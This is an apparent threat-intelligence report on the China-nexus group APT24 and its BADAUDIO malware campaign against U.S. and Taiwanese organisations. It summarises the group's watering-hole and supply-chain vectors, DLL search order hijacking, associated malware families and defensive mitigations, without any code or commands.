Full Report
A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign. "While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting
Analysis Summary
# Threat Actor: APT24
## Attribution & Identity
* **Identification:** A China-nexus threat actor.
* **Known Aliases:** Pitty Tiger.
* **Associated Groups:** Assessed to be closely related to Earth Aughisky.
## Activity Summary
APT24 has been engaged in a nearly three-year espionage campaign, active since November 2022. Historically, the group relied on broad strategic web compromises (watering holes). Recently, they have pivoted to more sophisticated vectors, specifically targeting organizations in Taiwan. Key parts of this campaign include:
1. **Strategic Web Compromises (Nov 2022 - Sept 2025):** Compromised over 20 legitimate websites to inject malicious JavaScript, creating unique browser fingerprints (using FingerprintJS) and serving targeted users downloading fake Chrome updates to acquire the BADAUDIO malware.
2. **Supply Chain Attacks (Starting July 2024):** Compromised a regional digital marketing firm in Taiwan and injected malicious JavaScript into a widely used JavaScript library distributed by the firm, impacting over 1,000 hijacked domains.
## Tactics, Techniques & Procedures
* **Initial Access:** Strategic web compromises (watering holes), targeted spear-phishing, supply chain compromises (via compromised digital marketing firm's software libraries).
* **Execution & Persistence:** Using BADAUDIO malware to establish persistent remote access.
* **Specific TTPs:**
* Leveraging **DLL Search Order Hijacking** (MITRE ATT&CK T1574.001) for BADAUDIO execution via legitimate applications.
* Using encrypted archives containing BADAUDIO DLLs alongside VBS, BAT, and LNK files for execution chains.
* Malware designed to read proxy settings from `%systemroot%\\system32\\sprxx.dll` (shared characteristic with Earth Aughisky tools).
## Targeting
* **Sectors:** Government, healthcare, construction and engineering, mining, nonprofit, and telecommunications.
* **Geography:** U.S. and, more recently, Taiwan.
* **Victims:** Over 20 legitimate websites exploited as watering holes; a regional digital marketing firm in Taiwan compromised for supply chain attacks influencing access to over 1,000 domains.
## Tools & Infrastructure
* **Malware Families Used:**
* BADAUDIO (Previously undocumented, primary focus of the recent campaign).
* CT RAT
* MM RAT (Goldsun-B) (Variant of Enfal/Lurid Downloader)
* Gh0st RAT variants (Paladin RAT, Leo RAT)
* Taidoor (Roudan)
* **Infrastructure:** Command and Control (C2) servers targeted by BADAUDIO for payload delivery. BADAUDIO downloads, decrypts, and executes an AES-encrypted payload from a hard-coded C2 server (one observed payload was Cobalt Strike Beacon).
## Implications
APT24 demonstrates a multi-year commitment to espionage, successfully transitioning from relying on commodity web compromises to deploying highly sophisticated, tailored supply chain attacks targeting specific geographic regions (Taiwan), indicating persistent intelligence gathering objectives against sensitive sectors. The deployment of newly discovered, obfuscated malware (BADAUDIO) highlights their ongoing capability development.
## Mitigations
* Monitor for and investigate unusual execution chains involving DLL Search Order Hijacking (T1574.001).
* Implement stringent vetting and monitoring of third-party JavaScript libraries and software updates to prevent supply chain compromise exploitation.
* Analyze network traffic for C2 communication patterns indicative of BADAUDIO's staging/payload retrieval mechanism (initial system info exfiltration followed by AES-encrypted payload download).
* Review systems for the presence of known APT24 malware families (CT RAT, Taidoor, etc.).